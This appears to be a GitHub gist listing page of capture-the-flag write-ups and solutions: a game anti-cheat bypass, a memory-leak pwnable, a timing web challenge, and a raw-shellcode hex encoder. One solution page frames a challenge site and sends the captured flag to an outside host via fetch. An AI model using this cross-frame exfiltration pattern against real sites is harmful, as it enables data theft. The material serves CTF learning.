@itszn
itszn / README.txt
Created November 6, 2016 23:25
The Wall
This challenge required that you write cheats for a Minecraft clone to bypass a large wall.
There are tons of ways to solve this, but here was the main idea.
- There was a client-side function that returned whether a player has certain privileges.
- Most of these were checked by the server as well, with the exception of fly and noclip (and speed walk to an extent)
o Also note, I didn't modify the server to ignore these, Minetest servers just do ¯\_(ツ)_/¯
- You can patch this function to return true, and the client can now toggle these abilities.
However the binary had extra anti-cheat built in
@itszn
itszn / README.txt
Created November 6, 2016 23:31
Fox Sim
This challenge was a source-only pwnable based on an aliasing bug with -O2. Also, not all the source code was given.
Intended solution outline:
- In the source in assignVotes, a voter and a candidate can become aliased, and -O2 optimization causes an incorrect return value.
o If the person is the same as the candidate, it sets the voteMessage to a constant string, which should change votesToGive as well, but the return is incorrect, so it instead returns the original votesToGive value.
o Then when going to print the error message, it instead tries to print the votes (if the value is greater than the address of main).
o This will print whatever pointer is given, allowing memory to be leaked up to a null byte.
- Now with an arbitrary read, we can dump the binary and reverse the missing code.
- We can also leak libc addresses and dump libc (or take it from some other challenge)
@itszn
itszn / README.md
Last active November 6, 2016 23:56
Just In Time

Just in Time

300 point
Web
Andrew Fasano

TL;DR;

This challenge can be solved by exploiting the time change from EDT to EST that will happen on Nov 6.

@itszn
itszn / gist:5c6030addaecd041af522a77975e986d
Created December 21, 2016 20:27
Super fast hex encoding
from timeit import timeit
from ctypes import *
'''
libc = CDLL('libc.so.6')
libc.mprotect(0x400000,0x1000,7)
s = "e810000000303132333435363738394142434445465b803f007437c6065c48ffc6c6067848ffc68a074825ff00000048c1e8044801d88a00880648ffc68a074883e00f4801d88a00880648ffc648ffc7ebc4c3".decode('hex')
#s = "\xc3"
libc.memcpy(0x400000, c_char_p(s),len(s))
@itszn
itszn / keybase.md
Created August 1, 2017 17:25
keybase.md

Keybase proof

I hereby claim:

  • I am itszn on github.
  • I am itszn (https://keybase.io/itszn) on keybase.
  • I have a public key ASAk2FcK4Zc6VAbULYP0m6uMVMTTBV1Cjr5QEL-4YsLlzgo

To claim this, I am signing this object:

301345b6e7e96c9d37137fbcab602685178e922c81e5da545c7958d9cd3315e9
@itszn
itszn / jquery-latest.js
Created June 19, 2019 16:39
Twitter Tag Challenge
/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.4.1",k=function(e,
@itszn
itszn / solve1.html
Last active November 8, 2019 17:41
Easiest Crackme Solution
<iframe src="http://crackme.web.chal.csaw.io/" id="a"></iframe>
<script>
let i=0;
window.addEventListener("message", function(event) {
msg = event.data;
console.log("attacker got ",msg);
if (msg.id == 0) {
a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*');
} else if (msg.id == 1) {
fetch("http://itszn.com/?flag="+msg.output);
@itszn
itszn / challengeresult.lua
Last active February 13, 2021 22:15
LiqidWave-1.4.1 Challenges
-- TODO: move util functions to common.lua
local charts = {}
local passed = false
local desw = 770
local desh = 800
local moveX = 0
local moveY = 0
@itszn
itszn / d8.js
Last active March 5, 2021 16:31
Plaid CTF 2018 d8 exploit
/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */
/* ### Utils, thanks saelo ### */
//
// Tiny module that provides big (64bit) integers.
//
// Copyright (c) 2016 Samuel Groß
//